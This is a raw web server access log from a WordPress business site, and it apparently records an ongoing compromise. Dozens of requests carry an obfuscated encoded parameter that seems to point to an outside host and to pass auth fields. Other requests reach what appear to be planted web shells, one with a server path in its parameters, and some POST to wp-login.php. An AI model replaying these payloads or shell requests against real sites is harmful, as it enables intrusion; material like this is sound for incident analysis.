179.188.53.243 - - [17/Mar/2026:02:44:08 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393834382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363234382q3337326639393263346333313936613339323330376633306633653766353631222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:44:29 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393836392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363236392q6236396531393366386132336261373239393365613862366263623337306164222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:44:50 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393839302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363239302q6635303966333965633565333464346365393433316335636332663136613633222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
45.62.98.251 45.62.98.251 - - [17/Mar/2026:02:50:00 -0300] "GET /.trash7206/index.php HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0"
45.62.98.251 45.62.98.251 - - [17/Mar/2026:02:50:02 -0300] "GET /.trash7206/index.php?ac=p&api=&path=&t=32e50bbcbaaec7c35c5f0cd3a41ca105 HTTP/1.1" 200 10590 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0"
45.62.98.251 45.62.98.251 - - [17/Mar/2026:02:50:05 -0300] "GET /.trash7206/index.php HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0"
179.188.53.243 - - [17/Mar/2026:02:45:11 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393931312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363331312q3836353563386239336563393433343134363132613931333034356261623634222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
45.62.98.251 45.62.98.251 - - [17/Mar/2026:02:50:07 -0300] "POST /.trash7206/index.php HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0"
45.62.98.251 45.62.98.251 - - [17/Mar/2026:02:50:10 -0300] "GET /.trash7206/index.php HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0"
45.62.98.251 45.62.98.251 - - [17/Mar/2026:02:50:14 -0300] "POST /.trash7206/index.php?pilihan=&path=%5Chome%5Cstorage%5C0%5Cfc%5C16%5Cbandeirantesbomb3%5Cpublic_html HTTP/1.1" 200 74433 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0"
45.62.98.251 45.62.98.251 - - [17/Mar/2026:02:50:16 -0300] "POST /.trash7206/index.php HTTP/1.1" 200 74425 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0"
179.188.53.243 - - [17/Mar/2026:02:45:33 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393933332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363333332q3563636235386162323338396439663334363365343730336263666362393938222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
74.7.244.31 - - [17/Mar/2026:02:50:51 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [17/Mar/2026:02:45:54 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393935342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363335342q3935373262376535383132616530393638356636333832346665393964363334222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:46:15 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393937352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363337352q3666386561626562303531313731353237373465326162333862396436316134222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:46:36 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333732393939362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363339362q3365353839656562336663306661373039646562326365393133303238323438222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:46:57 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333733303031372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363431372q6134656366303561663335643831663032306161386161326634333761363637222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:47:18 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333733303033382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363433382q3064376130623832376533343161326561626130373864663739373731663864222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
74.7.228.16 - - [17/Mar/2026:02:52:29 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [17/Mar/2026:02:47:39 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333733303035392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363435392q3430646138396631653633313461336330386634333332336166313066313662222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
107.150.56.234 - - [17/Mar/2026:02:52:47 -0300] "GET /.trash7206/index.php HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
107.150.56.234 - - [17/Mar/2026:02:52:48 -0300] "GET /favicon.ico HTTP/1.1" 200 74371 "https://bandeirantesbombas.com.br/.trash7206/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
51.89.43.80 - - [17/Mar/2026:02:52:53 -0300] "GET /?check_plugin HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
179.188.53.243 - - [17/Mar/2026:02:48:00 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333733303038302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363438302q3262653939376236633365386234363535366531643737356433653632363237222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:48:21 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333733303130312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363530312q3362353433663137323230363935366233616434363833316164613266626532222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
107.150.56.234 - - [17/Mar/2026:02:53:20 -0300] "POST /.trash7206/index.php HTTP/1.1" 200 74425 "https://bandeirantesbombas.com.br/.trash7206/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
107.150.56.234 - - [17/Mar/2026:02:53:22 -0300] "GET /favicon.ico HTTP/1.1" 200 74371 "https://bandeirantesbombas.com.br/.trash7206/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
107.150.56.234 - - [17/Mar/2026:02:53:35 -0300] "POST /.trash7206/index.php HTTP/1.1" 200 74425 "https://bandeirantesbombas.com.br/.trash7206/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
107.150.56.234 - - [17/Mar/2026:02:53:36 -0300] "GET /favicon.ico HTTP/1.1" 200 74371 "https://bandeirantesbombas.com.br/.trash7206/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
179.188.53.243 - - [17/Mar/2026:02:48:43 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333733303132332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363532332q6664623466343433373039353230303431333839376466316633393130303939222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:49:04 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333733303134342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363534342q6165653133363438326531626661613861353539343539353937386431613737222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
66.249.74.160 - - [17/Mar/2026:02:54:21 -0300] "GET /?t=fses110qkqjp49341xspqykw HTTP/1.1" 200 207410 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
179.188.53.243 - - [17/Mar/2026:02:49:26 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333733303136362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363536362q3731636662353634303435363530636166383439316330396134653864303035222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:49:48 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333733303138382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363538382q3036326336346437353435613039363336393963333863383930623733626663222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
37.59.29.69 - - [17/Mar/2026:02:54:54 -0300] "GET /wp-login.php HTTP/1.1" 200 74371 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
37.59.29.69 - - [17/Mar/2026:02:54:56 -0300] "POST /wp-login.php HTTP/1.1" 200 74371 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
66.249.74.160 - - [17/Mar/2026:02:54:58 -0300] "GET /?z=slnwi3a16768qvcvkxhei HTTP/1.1" 200 206666 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
179.188.53.243 - - [17/Mar/2026:02:50:09 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333733303230392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363630392q6533306538666230396636386631666562313530653830353562346536333636222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
66.249.74.160 - - [17/Mar/2026:02:55:13 -0300] "GET /?s=rsd27gjc6976rvvpuxyu HTTP/1.1" 200 210295 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
179.188.53.243 - - [17/Mar/2026:02:50:30 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333733303233302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363633302q3434353965323564383638623336313662396639323166323564613131313432222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [17/Mar/2026:02:50:51 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333733303235312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363635312q6239366436653439396631643339376561663637636364326330333539326536222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
204.12.208.18 - - [17/Mar/2026:02:55:31 -0300] "GET /wp-content/pl2ea67b/edit.php HTTP/1.1" 200 6 "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; ja-jp) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
74.7.244.31 - - [17/Mar/2026:02:56:12 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [17/Mar/2026:02:51:12 -0300] "GET /0270wp/0270wp/0270wp/0270wp/0270wp/0270wp/index.php?ARRAY=7o2230223n313737333733303237322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333732363637322q6539366661386561303464663632643236323737643162643465306334333863222p2232223n223838643861393431326366633631356165323537343837666233303766653436222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q34392q35312q36382q37342q38382q3238227q HTTP/1.1" 504 247 "-" "-"
204.12.208.18 - - [17/Mar/2026:02:55:51 -0300] "GET /wp-content/pl2ea67b/edit.php HTTP/1.1" 200 6 "https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2"
